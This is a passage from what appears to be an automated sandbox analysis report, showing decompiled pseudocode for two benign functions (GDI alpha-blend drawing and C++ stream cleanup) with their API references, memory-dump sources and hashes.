                                                                                                				void* _t30;
                                                                                                				intOrPtr* _t31;
                                                                                                
                                                                                                				_t31 = __esi;
                                                                                                				_t19 = _a4;
                                                                                                				_t25 =  *((intOrPtr*)(__esi + 0xc)) -  *((intOrPtr*)(__esi + 4));
                                                                                                				_t30 =  *((intOrPtr*)(__esi + 8)) -  *__esi;
                                                                                                				_v16 = _t19;
                                                                                                				_v12 = CreateCompatibleDC(_t19);
                                                                                                				_t21 =  *0xc165d8; // 0x0
                                                                                                				if(_t21 == 0) {
                                                                                                					_push(_a8);
                                                                                                					_push(_v16);
                                                                                                					_t21 = E00C11A1F(__esi);
                                                                                                				}
                                                                                                				SelectObject(_v12, _t21);
                                                                                                				_v8 = 0;
                                                                                                				_v7 = 0;
                                                                                                				_v6 = 0xff;
                                                                                                				_v5 = 1;
                                                                                                				__imp__AlphaBlend(_v16,  *_t31,  *((intOrPtr*)(_t31 + 4)), _t30, _t25, _v12, 0, 0, _t30, _t25, _v8);
                                                                                                				return DeleteDC(_v12);
                                                                                                			}














                                                                                                0x00c119a1
                                                                                                0x00c119a7
                                                                                                0x00c119ae
                                                                                                0x00c119b5
                                                                                                0x00c119b8
                                                                                                0x00c119c1
                                                                                                0x00c119c4
                                                                                                0x00c119cb
                                                                                                0x00c119cd
                                                                                                0x00c119d2
                                                                                                0x00c119d5
                                                                                                0x00c119db
                                                                                                0x00c119e0
                                                                                                0x00c119e6
                                                                                                0x00c119ea
                                                                                                0x00c119ee
                                                                                                0x00c119f2
                                                                                                0x00c11a0c
                                                                                                0x00c11a1e

                                                                                                APIs
                                                                                                • CreateCompatibleDC.GDI32(?), ref: 00C119BB
                                                                                                • SelectObject.GDI32(?,00000000), ref: 00C119E0
                                                                                                • AlphaBlend.MSIMG32(?,?,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 00C11A0C
                                                                                                • DeleteDC.GDI32(?), ref: 00C11A15
                                                                                                  • Part of subcall function 00C11A1F: OffsetRect.USER32(?,?,00000000), ref: 00C11A53
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.465008585.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000002.00000002.464985336.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465026006.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465049572.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465067843.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_c10000_eventvwr.jbxd
                                                                                                Similarity
                                                                                                • API ID: AlphaBlendCompatibleCreateDeleteObjectOffsetRectSelect
                                                                                                • String ID:
                                                                                                • API String ID: 2925259497-0
                                                                                                • Opcode ID: 9843c6abacb897f562da379b821f7726391e4e0c7b5672ef64edef5d61ba351e
                                                                                                • Instruction ID: 72bb423b19cc41ddac3dd5fffff233b36b0239f50e1c0fb60626185dfc99f4e3
                                                                                                • Opcode Fuzzy Hash: 9843c6abacb897f562da379b821f7726391e4e0c7b5672ef64edef5d61ba351e
                                                                                                • Instruction Fuzzy Hash: B1113935900248FFDF119FA9DC48F8EBFB9FF4A710F108099F655A21A0C731AA54AB20
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 25%
                                                                                                			E00C11D28(void* __esi, void* __eflags) {
                                                                                                				void* _t10;
                                                                                                				intOrPtr* _t11;
                                                                                                				void* _t14;
                                                                                                				void* _t19;
                                                                                                				intOrPtr* _t21;
                                                                                                				void* _t22;
                                                                                                
                                                                                                				_t10 = E00C130B8(E00C132BF, _t14, _t19, __esi);
                                                                                                				_t21 =  *((intOrPtr*)(_t22 + 8));
                                                                                                				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
                                                                                                				__imp__?uncaught_exception@std@@YA_NXZ(0);
                                                                                                				if(_t10 == 0) {
                                                                                                					__imp__?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                                                                                				}
                                                                                                				 *(_t22 - 4) =  *(_t22 - 4) | 0xffffffff;
                                                                                                				_t11 =  *_t21;
                                                                                                				_t12 =  *((intOrPtr*)( *((intOrPtr*)( *_t11 + 4)) + _t11 + 0x28));
                                                                                                				if( *((intOrPtr*)( *((intOrPtr*)( *_t11 + 4)) + _t11 + 0x28)) != 0) {
                                                                                                					__imp__?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                                                                                				}
                                                                                                				return E00C13121(_t12);
                                                                                                			}









                                                                                                0x00c11d2f
                                                                                                0x00c11d34
                                                                                                0x00c11d37
                                                                                                0x00c11d3b
                                                                                                0x00c11d43
                                                                                                0x00c11d47
                                                                                                0x00c11d47
                                                                                                0x00c11d4d
                                                                                                0x00c11d51
                                                                                                0x00c11d58
                                                                                                0x00c11d5e
                                                                                                0x00c11d62
                                                                                                0x00c11d62
                                                                                                0x00c11d6d

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00C11D2F
                                                                                                • ?uncaught_exception@std@@YA_NXZ.MSVCP90(00000000,00C11F94,?), ref: 00C11D3B
                                                                                                • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP90 ref: 00C11D47
                                                                                                • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP90 ref: 00C11D62
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.465008585.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000002.00000002.464985336.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465026006.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465049572.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000002.00000002.465067843.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_c10000_eventvwr.jbxd
                                                                                                Similarity
                                                                                                • API ID: D@std@@@std@@U?$char_traits@$?uncaught_exception@std@@H_prolog3Osfx@?$basic_ostream@Unlock@?$basic_streambuf@
                                                                                                • String ID:
                                                                                                • API String ID: 3571924652-0
                                                                                                • Opcode ID: cbea2e82ea0336b9ecfa24c46ccdb8c4bc7403f7a2c9aed12364deeed6fc3b31
                                                                                                • Instruction ID: 6ed55b6245841511601a1b0bfb9ff908c3cb25e3e3f850785f4a192bd71a00c0
                                                                                                • Opcode Fuzzy Hash: cbea2e82ea0336b9ecfa24c46ccdb8c4bc7403f7a2c9aed12364deeed6fc3b31
                                                                                                • Instruction Fuzzy Hash: 27E06D38200240DFDB14EF65D459B9C77B1BF1B315F24815CE6529B3A1CB329E45EB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%